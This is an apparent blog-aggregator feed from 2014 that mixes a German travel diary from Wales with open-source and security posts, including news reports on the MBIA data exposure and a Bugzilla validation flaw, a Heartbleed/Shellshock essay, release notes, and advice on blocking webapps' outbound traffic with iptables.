Aufgewachsen am Meer, halte ich es natürlich nicht lange ohne Salz in der Luft aus. schon gar nicht, wenn das Meer so nah ist! Also ging es gestern nach Barry am Bristol Channel. Während der ganzen Fahrt regnete es in Strömen, doch kaum konnte ich das Meer sehen, verzogen sich die Wolken und die Stadt begrüßte mich mit einem wunderschönen Regenbogen, den ich leider mangels Parkplatz nicht fotografieren konnte.

Eigentlich sollte es dort laut meiner Touristen-Straßenkarte ein paar historische Stätten geben, doch da sich die Stadtverwaltung die Mühe gemacht hatte, bereits etliche Kilom... äh Meilen vor der Stadt auf "Barry Island" und seine Attraktionen hinzuweisen, änderte ich kurzerhand meine Pläne und folgte der gut ausgeschilderten Route auf die "Insel", die eigentlich nur zwei Halbinseln ist (aber zwei halbe sind ...?). Der riesige Touristenparkplatz war natürlich komplett leer, also habe ich mein Auto nicht dort sondern schön direkt am Strand geparkt. Hat halt seine Vorteile, außerhalb der Saison Urlaub zu machen.

Beim Aussteigen merkte ich dann sofort, dass zwar der Regen ab- dafür aber ein ordentlicher Sturm aufgezogen war. Perfektes Wetter also. Schnell wurde klar, dass wohl gerade ablaufend Wasser war – reichlich viel "Strand", trocken liegende Muschelfelsen und Wellen, die trotz starken Windes quasi "auf der Stelle stehen" sind dann doch recht deutliche Anzeichen.

Eine Bucht weiter dann der alte Hafen von Barry, mitten im Hafenbecken vier kleine bis sehr kleine Boote, von denen offensichtlich noch höchstens zwei schwimmfähig waren – und alle lagen in Morast zwischen harten Gräsern. Kein Wasser weit und breit im Hafen. Und die Zufahrt zum Hafen machte diesbezüglich auch nicht besonders viel Hoffnung angesichts eines großen Hügels aus Strandsand, der dort offenbar im Laufe der Jahre angeschwemmt worden war.

Da gerade wieder ein Schauer aufzog, bin ich schnell in ein Restaurant geflüchtet für ein eher mageres (und hoffnungslos überteuertes) "Cajun Chicken"-Salätchen. Sowas geht anderswo als Vorspeise durch, und sollte schon 6 Pfund kosten. Da koche ich mir lieber abends selbst was richtiges! Immerhin schien nach dem Essen wieder die Sonne und so bin ich dann in die Innenstadt von Barry, wo man übrigens direkt an der Fußgängerzone gratis im Parkhaus parken kann. So richtig viel zu sehen gibt es dort außer dem Rathaus und der Hafenkommandatur am neuen Hafen nicht. Aber alles in allem ist es eine schöne, typisch britisch anmutende Stadt mit vielen Straßenzügen voller nahezu identischer Reihenhäuser. Ja, das sieht hier wirklich so aus, wie man das im Fernsehen immer sieht!

Nach einem gemütlichen Spaziergang stand dann die Sonne schon recht tief und ich dachte mir, dass bei diesem Licht bestimmt schöne Bilder der Schiffswracks im alten Hafen zu machen wären – also bin ich nochmal hin. Zu meiner Überraschung konnte ich bereits von weitem sehen, dass Sturm und Flut das Wasser bereits bis zur Kuppe der Sandbank am Eingang des Hafens gedrückt hatten. Es war also nur noch eine Frage der Zeit, bis das Hafenbecken sich mit Wasser füllen würde! Bei schönstem Wetter konnte ich also die nächste halbe Stunde (oder so) im Licht der untergehenden Sonne beobachten, wie ihre Kräfte mit denen des Mondes und des Windes zusammenwirken.

Heute war leider so richtig fieses Wetter. Und zwar "fies" im Sinne von "hinterhältig, gemein": Immer wieder guckte mal für ein paar Augenblicke die Sonne durch die Wolken, doch kaum, dass man die Jacke in der Hand und die Schuhe angezogen hatte, war sie wieder verschwunden. Sobald man einen Fuß vor die Tür setzte fing es an zu schütten, als gäbs kein Morgen mehr. War man wieder im Trockenen, hörte es prompt wieder auf. So habe ich es geschafft, dreimal nass zu werden, obwohl ich bisher insgesamt vielleicht 5 Minuten unter freiem Himmel war (jeweils auf dem Weg vom oder zum Auto). Aber der Wetterbericht meint, morgen würde es wieder besser werden, mal schaun.

Bis dann

André


As many of you know, my first book — Spam Nation — hits bookstore shelves on Nov. 18. I want to thank those of you who have already pre-ordered the book, and offer a small enticement for those who have yet to secure a copy.

Pre-order two or more copies of Spam Nation and get this “Krebs Edition” branded ZeusGard.
Spam Nation is a true story about organized cybercriminals, some of whom are actively involved in using malware-laced spam to empty bank accounts belonging to small- and medium-sized businesses in the United States and Europe. I’ve written extensively about organizations that have lost tens of millions of dollars from these cyberheists. I’ve also encouraged online banking customers to take advantage of various “Live CD” technologies that allow users to sidestep the very malware that powers these cyberheists.

In July, I wrote about ZeusGard, one such technology that’s designed to streamline the process of adopting the Live CD approach for online banking. The makers of ZeusGard got such a positive response from that story that they offered to partner with Yours Truly in promoting Spam Nation!

I’m pleased to report that the first 1,000 customers to purchase two or more copies of Spam Nation — including any combination of digital, physical and/or audio versions of the book — before the official book launch on Nov. 18 will receive a complimentary KrebsOnSecurity-branded version of ZeusGard (pictured above)!

If you already pre-ordered two copies of the book, print, digital and/or audio, and have submitted the proof-of-purchase to spamnation@sourcebookspr.com, you will automatically receive a ZeusGard and do not need to resend that proof-of-purchase. If you’ve already pre-ordered a copy and wish to acquire another (print, digital or audio copy), please make sure to send that extra proof-of-purchase to spamnation@sourcebookspr.com. Pre-order your copy via several prominent booksellers, including Amazon, Barnes & Noble, Politics & Prose, and Powell’s.

So far, we have just 19 buyers who’ve chosen to purchase two or more copies, so we’ve got plenty more to go. I’ll put up another post if we get close to making the 1,000 customer limit.

Pre-orders are a big deal in the publishing industry because they signal to book sellers that a book is generating buzz and demand. They’re also important because they count toward the first week of sales, which can determine whether a book lands on best-seller lists.

So far, the reviews are very positive. Kirkus Reviews found the book “an eye-opening, immensely distressing exposé on the current state of organized cyberspammers.” Publisher’s Weekly calls Spam Nation “timely, informative, and sadly relevant in our cyber-dependent age.”

The Spam Nation book tour will kick off on Nov. 20 in Chicago, the hometown of my publisher — Sourcebooks. From there, we’ll be stopping in several other cities, including San Francisco, Seattle and Austin. In early December, I’ll be signing copies of Spam Nation at bookstores in New York and Washington, D.C. Please see the full schedule for more details, and join me if you’re able!


Greetings from Wales My Universe | 2014-10-08 09:35 UTC

Hello from Wales!

Ich bin mal wieder auf Reisen, dieses Mal in Wales. Und da um diese Jahreszeit die Postkarten hier genauso schwer zu finden sind, wie andere Touristen, dachte ich, ich lasse Euch – für den Fall, dass das mit den versprochenen Postkarten nicht klappt – an dem teilhaben, was ich hier so täglich erlebe.

Was bisher geschah ...

Am Montag (vorgestern) bin ich, trotz extrem verspätetem Abflug, nach einem ziemlich unruhigen Flug um kurz nach 3pm in Heathrow angekommen. Schnell das Auto geholt – ein VW-Golf Diesel, dem als einziges Extra nur der Tempomat fehlt – und ab auf die M4 in Richtung "SOUTH WALES". Kurz vor Wales dann ein kurzer Schrecken: die Brücke über den River Severn – bzw. dessen Mündung in den Bristol Channel – ist mautpflichtig. Und ich hatte noch gar kein Bargeld in der Tasche. Kurzentschlossen also die letzte Ausfahrt raus, nach einem Geldautomaten suchen ... stellt sich heraus: die letzte Ausfahrt ist ein Autobahndreieck mit der M48. Also wieder die nächste Ausfahrt ... dummerweise ein Autobahnkreuz mit der M5. Neues Spiel, neues Glück? Nunja, der Stau auf der linken Spur sah zumindest vielversprechend aus. Und nur 30 Minuten später war ich dann auch schon auf einer Raststätte.

Frisch gestärkt (machen die hier überall so wenig Salz dran?) und mit ein paar Scheinen Monopoly-Geld ... ähm ... Pfund Sterling in der Tasche gings wieder zurück auf die Autobahn. Immerhin: alle Staus, die zuvor noch im Verkehrsfunk zu hören waren, waren inzwischen verschwunden. Die Brücke selbst: ein Erlebnis! Schade, dass ich weder davor noch dahinter (ganz zu schweigen von "irgendwo auf der Brücke") einen Rastplatz zum Fotografieren finden konnte. Ich werde auf jeden Fall versuchen, dass mal bei Gelegenheit nachzuholen!

Gegen halb acht kam ich dann endlich an meinem Ziel an: Taff's Well nördlich von Cardiff. Eine tolle Unterkunft, nette Vermieter, allerdings ist "Railway Cottage" sehr viel sprechender gemeint gewesen, als ich ursprünglich gedacht hatte: Während das Schlafzimmer zur Dorfstraße rausgeht (die leider tagsüber relativ stark frequentiert ist), fährt quasi direkt vor dem Wohnzimmer (etwa 10 Meter entfernt) alle 10 Minuten die Bahn Cardiff-Pontypridd durch. Immerhin ist nachts Ruhe – was aber auch bedeutet, dass man ab 11pm nicht mehr mit der Bahn aus Cardiff heraus kommt.

Dienstag morgen habe ich erstmal ausgeschlafen und dann gegen 11am erstmal Elisa geweckt, die gerade in Cardiff studiert und im Nachbardorf wohnt. Nach einem ausgedehnten "Welsh Breakfast" musste sie dann zur Uni und ich hab mich aufgemacht, die Gegend hier ein wenig zu erkunden. Eigentlich war mein Plan, über Land – also unter Umgehung der unzähligen Autobahnen hier – zum Coch Castle zu fahren. Irgendwie landete ich dann aber westlich von Cardiff auf der M4 ... also doch Autobahn, erstmal zurück Richtung Taff's Well und dann den Schildern zur Burg gefolgt. Eigentlich gar nicht so schwer, jedenfalls am Anfang. Doch plötzlich – die Burg schon weit hinter mir – keine Schilder mehr. Stattdessen enge Bergstraßen und reichlich optimistische, wenn auch stets sehr nette, einheimische Autofahrer. Dann plötzlich wieder Schilder, doch wie sich herausstellt zum Caerphilly Castle. Meinetwegen. Sogar den Parkplatz habe ich dort auf Anhieb gefunden – und trotz irreführender Ausschilderung auch den Fußweg zur Burg. Ein tolles Bauwerk, dass ich unbedingt nochmal von innen sehen muss! Aufgrund der späten Stunde reichte es dieses Mal nämlich nur für einen Rundgang außen herum. Und da ich ohnehin auf dem Weg zurück zur Unterkunft an Coch Castle vorbei musste, habe ich einen zweiten Versuch gewagt – und sogar durch Zufall den Wanderparkplatz gefunden, von dem aus man dann zu Fuß zur Burg weiter kommt! Nun, auch das bleibt für einen anderen Tag.

Abends dann ein kleiner Ausflug nach Cardiff, eigentlich mit dem Ziel, mich mit Elisa und ein paar Ihrer Mitstudenten zu treffen. Doch letztere tauchten nicht auf und so haben wir uns selbst einen Pub gesucht, uns gegenseitig auf den neuesten Stand gebracht und Pläne für die nächsten Tage geschmiedet. Der Rückweg ... nunja, eine kleine Odyssee über Cardiffs unzählige Schnellstraßen ... Nachdem ich ungefähr zehnmal im Kreisverkehr zu früh rausgefahren bin (jeweils bei dem Versuch, zu wenden), hat dann Elisa das Lesen des TomTom übernommen, und siehe da ...

Soweit bisher, heute will ich ans Wasser. Und bei der Burgen-Dichte hier, wird es da bestimmt auch eine Burg zum Besichtigen geben.

Bis morgen!

André


py3status v1.6 Ultrabug | 2014-10-08 09:01 UTC

Back from holidays, this new version of py3status was due for a long time now as it features a lot of great contributions !

This version is dedicated to the amazing @ShadowPrince who contributed 6 new modules

Changelog

  • core : rename the ‘examples’ folder to ‘modules’
  • core : Fix include_paths default wrt issue #38, by Frank Haun
  • new vnstat module, by Vasiliy Horbachenko
  • new net_rate module, alternative module for tracking network rate, by Vasiliy Horbachenko
  • new scratchpad-counter module and window-title module for displaying current windows title, by Vasiliy Horbachenko
  • new keyboard-layout module, by Vasiliy Horbachenko
  • new mpd_status module, by Vasiliy Horbachenko
  • new clementine module displaying the current “artist – title” playing in Clementine, by François LASSERRE
  • module clementine.py: Make python3 compatible, by Frank Haun
  • add optional CPU temperature to the sysdata module, by Rayeshman

Contributors

Huge thanks to this release’s contributors :

  • @ChoiZ
  • @fhaun
  • @rayeshman
  • @ShadowPrince

What’s next ?

The next 1.7 release of py3status will bring a neat and cool feature which I’m sure you’ll love, stay tuned !


On Monday, KrebsOnSecurity notified MBIA Inc. — the nation’s largest bond insurer — that a misconfiguration in a company Web server had exposed countless customer account numbers, balances and other sensitive data. Much of the information had been indexed by search engines, including a page listing administrative credentials that attackers could use to access data that wasn’t already accessible via a simple Web search.

A redacted screenshot of MBIA account information exposed to search engines.
MBIA Inc., based in Purchase, N.Y., is a public holding company that offers municipal bond insurance and investment management products. According to the firm’s Wiki page, MBIA, formerly known as the Municipal Bond Insurance Association, was formed in 1973 to diversify the holdings of several insurance companies, including Aetna, Fireman’s Fund, Travelers, Cigna and Continental.

Notified about the breach, the company quickly disabled the vulnerable site — mbiaweb.com. This Web property contained customer data from Cutwater Asset Management, a fixed-income unit of MBIA that is slated to be acquired by BNY Mellon Corp.

“We have been notified that certain information related to clients of MBIA’s asset management subsidiary, Cutwater Asset Management, may have been illegally accessed,” said MBIA spokesman Kevin Brown. “We are conducting a thorough investigation and will take all measures necessary to protect our customers’ data, secure our systems, and preserve evidence for law enforcement.”

Brown said MBIA notified all current customers about the incident Monday evening, and that it planned to notify former customers today.

Some 230 pages of account statements from Cutwater had been indexed by Google, including account and routing numbers, balances, dividends and account holder names for the Texas CLASS (a local government investment pool) ; the Louisiana Asset Management Pool; the New Hampshire Public Deposit Investment Pool; Connecticut CLASS Plus; and the Town of Richmond, NH.

In some cases, the documents indexed by search engines featured detailed instructions on how to authorize new bank accounts for deposits, including the forms and fax numbers needed to submit the account information.

Bryan Seely, an independent security expert with Seely Security, discovered the exposed data using a search engine. Seely said the data was exposed thanks to a poorly configured Oracle Reports database server. Normally, Seely said, this type of database server is configured to serve information only to authorized users who are accessing the data from within a trusted, private network — and certainly not open to the Web.



Worse yet, Seely noted, that misconfiguration also exposed an Oracle reports diagnostics page that included the username and password that would grant access to nearly all of the customer account data on the server.

“Malicious hackers finding dozens of universities or companies with Social Security numbers, health data or other information is devastating, but stumbling on bank accounts and the instructions for how to empty them is potentially catastrophic,” Seely said. “Billions in taxpayer funds, invested into one of the largest institutions in the world that were essentially being guarded by a sleeping security guard. What happens to those states when the money disappears?”

A misconfigured Oracle reports server can expose massive troves of sensitive data, a fact documented time and again by another independent researcher — Dana Taylor of NI @root. If your organization depends on Oracle Reports Services, please ensure that your administrators have read and implemented Oracle’s advice on securing these systems.

The accidental disclosure of customer data from MBIA comes amid revelations that foreign hackers — possibly organized crime groups operating out of Russia — hacked into networks of JPMorgan Chase. In public filings last week, JPMorgan said the breach exposed names, addresses, email address and phone numbers for 76 million household accounts and seven million small businesses. However, JPMorgan said that it has no indication that account numbers were exposed in the break-in.

Update, 3:03 p.m. ET: Updated the first and second paragraphs to clarify that the Municipal Bond Insurance Association is a former name for MBIA Inc.


The free software community was recently shattered by two security bugs called Heartbleed and Shellshock. While technically these bugs where quite different I think they still share a lot.

Heartbleed hit the news in April this year. A bug in OpenSSL that allowed to extract privat keys of encrypted connections. When a bug in Bash called Shellshock hit the news I was first hesistant to call it bigger than Heartbleed. But now I am pretty sure it is. While Heartbleed was big there were some things that alleviated the impact. It took some days till people found out how to practically extract private keys - and it still wasn't fast. And the most likely attack scenario - stealing a private key and pulling off a Man-in-the-Middle-attack - seemed something that'd still pose some difficulties to an attacker. It seemed that people who update their systems quickly (like me) weren't in any real danger.

Shellshock was different. It's astonishingly simple to use and real attacks started hours after it became public. If circumstances had been unfortunate there would've been a very real chance that my own servers could've been hit by it. I usually feel the IT stuff under my responsibility is pretty safe, so things like this scare me.

What OpenSSL and Bash have in common

Shortly after Heartbleed something became very obvious: The OpenSSL project wasn't in good shape. The software that pretty much everyone in the Internet uses to do encryption was run by a small number of underpaid people. People trying to contribute and submit patches were often ignored (I know that, I tried it). The truth about Bash looks even grimmer: It's a project mostly run by a single volunteer. And yet almost every large Internet company out there uses it. Apple installs it on every laptop. OpenSSL and Bash are crucial pieces of software and run on the majority of the servers that run the Internet. Yet they are very small projects backed by few people. Besides they are both quite old, you'll find tons of legacy code in them written more than a decade ago.

People like to rant about the code quality of software like OpenSSL and Bash. However I am not that concerned about these two projects. This is the upside of events like these: OpenSSL is probably much securer than it ever was and after the dust settles Bash will be a better piece of software. If you want to ask yourself where the next Heartbleed/Shellshock-alike bug will happen, ask this: What projects are there that are installed on almost every Linux system out there? And how many of them have a healthy community and received a good security audit lately?

Software installed on almost any Linux system

Let me propose a little experiment: Take your favorite Linux distribution, make a minimal installation without anything and look what's installed. These are the software projects you should worry about. To make things easier I did this for you. I took my own system of choice, Gentoo Linux, but the results wouldn't be very different on other distributions. The results are at at the bottom of this text. (I removed everything Gentoo-specific.) I admit this is oversimplifying things. Some of these provide more attack surface than others, we should probably worry more about the ones that are directly involved in providing network services.

After Heartbleed some people already asked questions like these. How could it happen that a project so essential to IT security is so underfunded? Some large companies acted and the result is the Core Infrastructure Initiative by the Linux Foundation, which already helped improving OpenSSL development. This is a great start and an example for an initiative of which we should have more. We should ask the large IT companies who are not part of that initiative what they are doing to improve overall Internet security.

Just to put this into perspective: A thorough security audit of a project like Bash would probably require a five figure number of dollars. For a small, volunteer driven project this is huge. For a company like Apple - the one that installed Bash on all their laptops - it's nearly nothing.

There's another recent development I find noteworthy. Google started Project Zero where they hired some of the brightest minds in IT security and gave them a single job: Search for security bugs. Not in Google's own software. In every piece of software out there. This is not merely an altruistic project. It makes sense for Google. They want the web to be a safer place - because the web is where they earn their money. I like that approach a lot and I have only one question to ask about it: Why doesn't every large IT company have a Project Zero?

Sparking interest

There's another aspect I want to talk about. After Heartbleed people started having a closer look at OpenSSL and found a number of small and one other quite severe issue. After Bash people instantly found more issues in the function parser and we now have six CVEs for Shellshock and friends. When a piece of software is affected by a severe security bug people start to look for more. I wonder what it'd take to have people looking at the projects that aren't in the spotlight.

I was brainstorming if we could have something like a "free software audit action day". A regular call where an important but neglected project is chosen and the security community is asked to have a look at it. This is just a vague idea for now, if you like it please leave a comment.

That's it. I refrain from having discussions whether bugs like Heartbleed or Shellshock disprove the "many eyes"-principle that free software advocates like to cite, because I think these discussions are a pointless waste of time. I'd like to discuss how to improve things. Let's start.

Here's the promised list of Gentoo packages in the standard installation:

bzip2
gzip
tar
unzip
xz-utils
nano
ca-certificates
mime-types
pax-utils
bash
build-docbook-catalog
docbook-xml-dtd
docbook-xsl-stylesheets
openjade
opensp
po4a
sgml-common
perl
python
elfutils
expat
glib
gmp
libffi
libgcrypt
libgpg-error
libpcre
libpipeline
libxml2
libxslt
mpc
mpfr
openssl
popt
Locale-gettext
SGMLSpm
TermReadKey
Text-CharWidth
Text-WrapI18N
XML-Parser
gperf
gtk-doc-am
intltool
pkgconfig
iputils
netifrc
openssh
rsync
wget
acl
attr
baselayout
busybox
coreutils
debianutils
diffutils
file
findutils
gawk
grep
groff
help2man
hwids
kbd
kmod
less
man-db
man-pages
man-pages-posix
net-tools
sed
shadow
sysvinit
tcp-wrappers
texinfo
util-linux
which
pambase
autoconf
automake
binutils
bison
flex
gcc
gettext
gnuconfig
libtool
m4
make
patch
e2fsprogs
udev
linux-headers
cracklib
db
e2fsprogs-libs
gdbm
glibc
libcap
ncurses
pam
readline
timezone-data
zlib
procps
psmisc
shared-mime-info


For those of you on Edge and who wish to test the new Linux emulation and the new Appcafe, Kris has posted the instructions:

CentOS 6.5 emulation has been made the default for the EDGE packages going out this weekend. This replaces the legacy f10 package set. I’ve tested / confirmed that Flash works properly, haven’t tried net-im/skype4 yet, but a package is available for those who want to try.

I’ve seen a few issues doing the update here with PKG. It seems often the conflict detection won’t remove f10 on its own, so I’ve had to do this:

# pkg update –f
# pkg delete linux_base-f10\*
# pkg install nvidia-driver (Skip this if you don’t use nvidia drivers)
# pkg install pcbsd-base
# pkg upgrade
# pc-extractoverlay ports
# reboot

After reboot, you need to recreate the flash plugin:

% flashpluginctl off && flashpluginctl on

Let us know any issues you see with the newer linux emulation layer.

Also, if you run into problems launching / navigating the newer AppCafe, please open bug reports asap. We are working to stabilize that as quickly as possible. Bug reports should be created at bugs.pcbsd.org.



A previously unknown security flaw in Bugzilla — a popular online bug-tracking tool used by Mozilla and many of the open source Linux distributions — allows anyone to view detailed reports about unfixed vulnerabilities in a broad swath of software. Bugzilla is expected today to issue a fix for this very serious weakness, which potentially exposes a veritable gold mine of vulnerabilities that would be highly prized by cyber criminals and nation-state actors.

The Bugzilla mascot.
Multiple software projects use Bugzilla to keep track of bugs and flaws that are reported by users. The Bugzilla platform allows anyone to create an account that can be used to report glitches or security issues in those projects. But as it turns out, that same reporting mechanism can be abused to reveal sensitive information about as-yet unfixed security holes in software packages that rely on Bugzilla.

A developer or security researcher who wants to report a flaw in Mozilla Firefox, for example, can sign up for an account at Mozilla’s Bugzilla platform. Bugzilla responds automatically by sending a validation email to the address specified in the signup request. But recently, researchers at security firm Check Point Software Technologies discovered that it was possible to create Bugzilla user accounts that bypass that validation process.

“Our exploit allows us to bypass that and register using any email we want, even if we don’t have access to it, because there is no validation that you actually control that domain,” said Shahar Tal, vulnerability research team leader for Check Point. “Because of the way permissions work on Bugzilla, we can get administrative privileges by simply registering using an address from one of the domains of the Bugzilla installation owner. For example, we registered as admin@mozilla.org, and suddenly we could see every private bug under Firefox and everything else under Mozilla.”



Bugzilla is expected today to release updates to remove the vulnerability and help further secure its core product. Update, 1:59 p.m. ET: An update that addresses this vulnerability and several others in Bugzilla is available here.

“An independent researcher has reported a vulnerability in Bugzilla which allows the manipulation of some database fields at the user creation procedure on Bugzilla, including the ‘login_name’ field,” said Sid Stamm, principal security and privacy engineer at Mozilla, which developed the tool and has licensed it for use under the Mozilla public license.

“This flaw allows an attacker to bypass email verification when they create an account, which may allow that account holder to assume some privileges, depending on how a particular Bugzilla instance is managed,” Stamm said. “There have been no reports from users that sensitive data has been compromised and we have no other reason to believe the vulnerability has been exploited. We expect the fixes to be released on Monday.”

The flaw is the latest in a string of critical and long-lived vulnerabilities to surface in the past year — including Heartbleed and Shellshock — that would be ripe for exploitation by nation state adversaries searching for secret ways to access huge volumes of sensitive data.

“The fact is that this was there for 10 years and no one saw it until now,” said Tal. “If nation state adversaries [had] access to private bug data, they would have a ball with this. There is no way to find out if anyone did exploit this other than going through user list and seeing if you have a suspicious user there.”

Like Heartbleed, this flaw was present in open source software to which countless developers and security experts had direct access for years on end.

“The perception that many eyes have looked at open source code and it’s secure because so many people have looked at it, I think this is false,” Tal said. “Because no one really audits code unless they’re committed to it or they’re paid to do it. This is why we can see such foolish bugs in very popular code.”

Update, Oct. 7, 12:44 p.m. ET: Mozilla issued the following statement in response to this story:

Regarding the comment in the first paragraph: While it’s a theoretical possibility that other Bugzilla installations expose security bugs to “all employees,” Mozilla does not do this and as a result our security bugs were not available to potential exploiters of this flaw.
At no time did Check Point get “administrative privileges” on bugzilla.mozilla.org. They did create an account called admin@mozilla.org that would inherit “netscapeconfidential” privileges, but we stopped using this privilege level long before the reported vulnerability was introduced.  They also created “admin@mozilla.com” which inherited “mozilla-employee” access. We do actively use that classification, but not for security bugs.
In addition, on bugzilla.mozilla.org Mozilla regularly checks @mozilla.com addresses against the employee database and would have caught any fraudulently created @mozilla.com accounts quickly.


In this post, I’m using bind98-9.8.8 from ports on FreeBSD 9.3, in case that helps you. Today, I was adjusting the pgcon.org domain as part of the move from the old server to the new server. This move would also see the website updated to PGCon 2015 and the use of Ansible for configuring that [...]


gelt Dan Langille's Other Diary | 2014-10-04 13:16 UTC

For future reference. This server formed the backbone of just about everything I did. It hosted about 13 domains. Sadly, it was i386 and would not do for ZFS. Copyright (c) 1992-2014 The FreeBSD Project. Copyright (c) 1979, 1980, 1983, 1986, 1988, 1989, 1991, 1992, 1993, 1994 The Regents of the University of California. All [...]


The first RC build for the FreeBSD 10.1 release cycle is now available. ISO images for the amd64, armv6, i386, ia64, powerpc, powerpc64 and sparc64 architectures are available on most of our FreeBSD mirror sites.


It has been four months since my last major build and release of Lilblue Linux, a pet project of mine [1].  The name is a bit pretentious, I admit, since Lilblue is not some other Linux distro.  It is Gentoo, but Gentoo with a twist.  It’s a fully featured amd64, hardened, XFCE4 desktop that uses uClibc instead of glibc as its standard C library.  I use it on some of my workstations at the College and at home, like any other desktop, and I know other people that use it too, but the main reason for its existence is that I wanted to push uClibc to its limits and see where things break.  Back in 2011, I got bored of working with the usual set of embedded packages.  So, while my students where writing their exams in Modern OS, I entertained myself just adding more and more packages to a stage3-amd64-hardened system [2] until I had a decent desktop.  After playing with it on and off, I finally polished it where I thought others might enjoy it too and started pushing out releases.  Recently, I found out that the folks behind uselessd [3] used Lilblue as their testing ground. uselessd is another response to systemd [4], something like eudev [5], which I maintain, so the irony here is too much not to mention!  But that’s another story …

There was only one interesting issue about this release.  Generally I try to keep all releases about the same.  I’m not constantly updating the list of packages in @world.  I did remove pulseaudio this time around because it never did work right and I don’t use it.  I’ll fix it in the future, but not yet!  Instead, I concentrated on a much more interesting problem with a new release of e2fsprogs [6].   The problem started when upstream’s commit 58229aaf removed a broken fallback syscall for fallocate64() on systems where the latter is unavailable [7].  There was nothing wrong with this commit, in fact, it was the correct thing to do.  e4defrag.c used to have the following code:

#ifndef HAVE_FALLOCATE64
#warning Using locally defined fallocate syscall interface.

#ifndef __NR_fallocate
#error Your kernel headers dont define __NR_fallocate
#endif

/*
 * fallocate64() - Manipulate file space.
 *
 * @fd: defrag target file's descriptor.
 * @mode: process flag.
 * @offset: file offset.
 * @len: file size.
 */
static int fallocate64(int fd, int mode, loff_t offset, loff_t len)
{
    return syscall(__NR_fallocate, fd, mode, offset, len);
}
#endif /* ! HAVE_FALLOCATE */
The idea was that, if a configure test for fallocate64() failed because it isn’t available in your libc, but there is a system call for it in the kernel, then e4defrag would just make the syscall via your libc’s indirect syscall() function.  Seems simple enough, except that how system calls are dispatched is architecture and ABI dependant and the above is broken on 32-bit systems [8].  Of course, uClibc didn’t have fallocate() so e4defrag failed to build after that commit.  To my surprise, musl does have fallocate() so this wasn’t a problem there, even though it is a Linux specific function and not in any standard.

My first approach was to patch e2fsprogs to use posix_fallocate() which is supposed to be equivalent to fallocate() when invoked with mode = 0.  e4defrag calls fallocate() in mode = 0, so this seemed like a simple fix.  However, this was not acceptable to Ts’o since he was worried that some libc might implement posix_fallocate() by brute force writing 0′s.  That could be horribly slow for large allocations!  This wasn’t the case for uClibc’s implementation but that didn’t seem to make much difference upstream.  Meh.

Rather than fight e2fsprogs, I sat down and hacked fallocate() into uClibc.  Since both fallocate() and posix_fallocate(), and their LFS counterparts fallocate64() and posix_fallocate64(), make the same syscall, it was sufficient to isolate that in an internal function which both could make use of.  That, plus a test suite, and Bernhard was kind enough to commit it to master [10].  Then a couple of backports, and uClibc’s 0.9.33 branch now has the fix as well.  Because there hasn’t been a release of  uClibc in about two years, I’m using the 0.9.33 branch HEAD for Lilblue, so the problem there was solved — I know its a little problematic, but it was either that or try to juggle dozens of patches.

The only thing that remains is to backport those fixes to vapier’s patchset that he maintains for the uClibc ebuilds.  Since my uClibc stage3′s don’t use the 0.9.33 branch head, but the stable tree ebuilds which use the vanilla 0.9.33.2 release plus Mike’s patchset, upgrading e2fsprogs is blocked for those stages.

This whole process may seem like a real pita, but this is exactly the sort of issues I like uncovering and cleaning up.  So far, the feedback on the latest release is good.  If you want to play with Lilblue and you don’t have a free box, fire up VirtualBox or your emulator of choice and give it a try.  You can download it from the experimental/amd64/uclibc off any mirror [11].



One of the interesting thing that I noticed after shellshock was the amount of probes for vulnerabilities that counted on webapp users to have direct network access. Not only ping to known addresses to just verify the vulnerability, or wget or curl with unique IDs, but even very rough nc or even /dev/tcp connections to give remote shells. The fact that probes are there makes it logical to me to expect that for at least some of the systems these actually worked.

The reason why this piqued my interest is because I realized that most people don't do the one obvious step to mitigate this kind of problems by removing (or at least limiting) the access to the network of their web apps. So I decided it might be a worth idea to describe a moment why you should think of that. This is in part because I found out last year at LISA that not all sysadmins have enough training in development to immediately pick up how things work, and in part because I know that even if you're a programmer it might be counterintuitive for you to think that web apps should not have access, well, to the web.

Indeed, if you think of your app in the abstract, it has to have access to the network to serve the response to the users, right? But what happens generally is that you have some division between the web server and the app itself. People who have looked into Java in the early nougthies probably have heard of the term Application Server, which usually is present in form of Apache Tomcat or IBM WebSphere, but here is essentially the same "actor" for Rails app in the form of Passenger, or for PHP with the php-fpm service. These "servers" are effectively self-contained environments for your app, that talk with the web server to receive user requests and serve them responses. This essentially mean that in the basic web interaction, there is no network access needed for the application service.

Things gets a bit more complicated in the Web 2.0 era though: OAuth2 requires your web app to talk, from the backend, with the authentication or data providers. Similarly even my blog needs to talk with some services, to either ping them to tell them that a new post is out, and to check with Akismet for blog comments that might or might not be spam. WordPress plugins that create thumbnails are known to exist and to have a bad history of security and they fetch external content, such as videos from YouTube and Vimeo, or images from Flickr and other hosting websites to process. So there is a good amount of network connectivity needed for web apps too. Which means that rather than just isolating apps from the network, what you need to implement is some sort of filter.

Now, there are plenty of ways to remove access to the network from your webapp: SElinux, GrSec RBAC, AppArmor, … but if you don't want to set up a complex security system, you can do the trick even with the bare minimum of the Linux kernel, iptables and CONFIG_NETFILTER_XT_MATCH_OWNER. Essentially what this allows you to do is to match (and thus filter) connections based of the originating (or destination) user. This of course only works if you can isolate your webapps on a separate user, which is definitely what you should do, but not necessarily what people are doing. Especially with things like mod_perl or mod_php, separating webapps in users is difficult – they run in-process with the webserver, and negate the split with the application server – but at least php-fpm and Passenger allow for that quite easily. Running as separate users, by the way, has many more advantages than just network filtering, so start doing that now, no matter what.

Now depending on what webapp you have in front of you, you have different ways to achieve a near-perfect setup. In my case I have a few different applications running across my servers. My blog, a WordPress blog of a customer, phpMyAdmin for that database, and finally a webapp for an old customer which is essentially an ERP. These have different requirements so I'll start from the one that has the lowest.

The ERP app was designed to be as simple as possible: it's a basic Rails app that uses PostgreSQL to store data. The authentication is done by Apache via HTTP Basic Auth over HTTPS (no plaintext), so there is no OAuth2 or other backend interaction. The only expected connection is to the PostgreSQL server. Pretty similar the requirements for phpMyAdmin: it only has to interface with Apache and with the MySQL service it administers, and the authentication is also done on the HTTP side (also encrypted). For both these apps, your network policy is quite obvious: negate any outside connectivity. This becomes a matter of iptables -A OUTPUT -o eth0 -m owner --uid-owner phpmyadmin -j REJECT — and the same for the other user.

